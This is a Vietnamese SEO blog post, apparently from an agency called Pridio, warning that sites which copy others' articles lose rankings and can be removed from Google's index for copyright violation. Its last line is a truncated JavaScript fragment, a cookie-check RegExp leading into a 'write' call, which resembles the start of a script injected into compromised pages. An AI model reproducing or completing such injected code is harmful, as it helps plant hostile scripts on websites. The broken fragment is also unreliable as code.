Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > Website lấy nội dung chùa, chết lúc nào không biết?

Website lấy nội dung chùa, chết lúc nào không biết?

Sau vài tuần mệt mỏi cho việc kết thúc chiến dịch SEO gần trăm từ khóa cho một khách hàng. Tôi mới có chút thời gian rảnh rỗi viết Blog chia sẻ một số thứ cho các bạn. Như tiêu đề thì nội dung tôi muốn nói đến hôm nay là việc copy bài vô tội vạ của các Website hiện nay.

bảo vệ SEO bằng Copyright

 

Có rất nhiều website, kể cả website bình thường đến các website của các công ty SEO đều đi copy các bài viết của các website khác rồi đưa về làm bài của mình. Họ làm một cách cẩu thả và vô tội vạ để cho có tin, bài trên Website. Cái lợi thì ít mà điểm hại thì nhiều vô kể:

– Website bị đánh giá là đi copy bài viết => Giảm thứ hạng.

– Không hình thành các kĩ năng nội dung cho người phát triển website khiến đối thủ dễ vượt qua.

– Website càng làm backlinks càng xuống vì nội dung yếu.

– Dễ dàng vào Sandbox hơn khi mua lượng backlinks lớn.

– Bài viết sót link của đối thủ => Lại làm tăng thứ hạng website của đối thủ.

Tuy các bài viết của tôi chưa được hay lắm nhưng cũng vui vẻ ở một điểm là có nhiều người copy bài viết của tôi về các Website của họ. Tôi không lo sợ điều đó bởi thuật toán của google đã nhận ra việc copy này. Google đã loại bỏ ra khỏi kết quả tìm kiếm link bài có nội dung copy bài của tôi.

Bài viết: Cách tạo nguồn link hiệu quả cho quá trình SEO của tôi sẽ xuất hiện trên Page 1 google khi các bạn search các từ như: “cách tạo nguồn link” hoặc ” nguồn link SEO”. Và khi kéo xuống dưới bạn sẽ thấy google đã loại bỏ đi 1 kết quả theo luật chống vi phạm bản quyền.

Dịch vụ SEO

Và Website bị xóa Index vì vi phạm bản quyền khi Copy bài viết của tôi là www.s*********t.com.

thiết kế web

 Vì thế ngay từ giờ hãy tập cho mình thói quen tự viết bài và đừng Copy bài viết từ website người khác mà không xin phép để tránh bị google xóa Index và dãn nhãn “Amateur – SEOer”.

Pridio hoàn toàn hoan nghênh các bạn Copy Bài viết của chúng tôi nếu nó có ích cho bạn. Nhưng trước khi làm điều đó hãy xin phép.

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘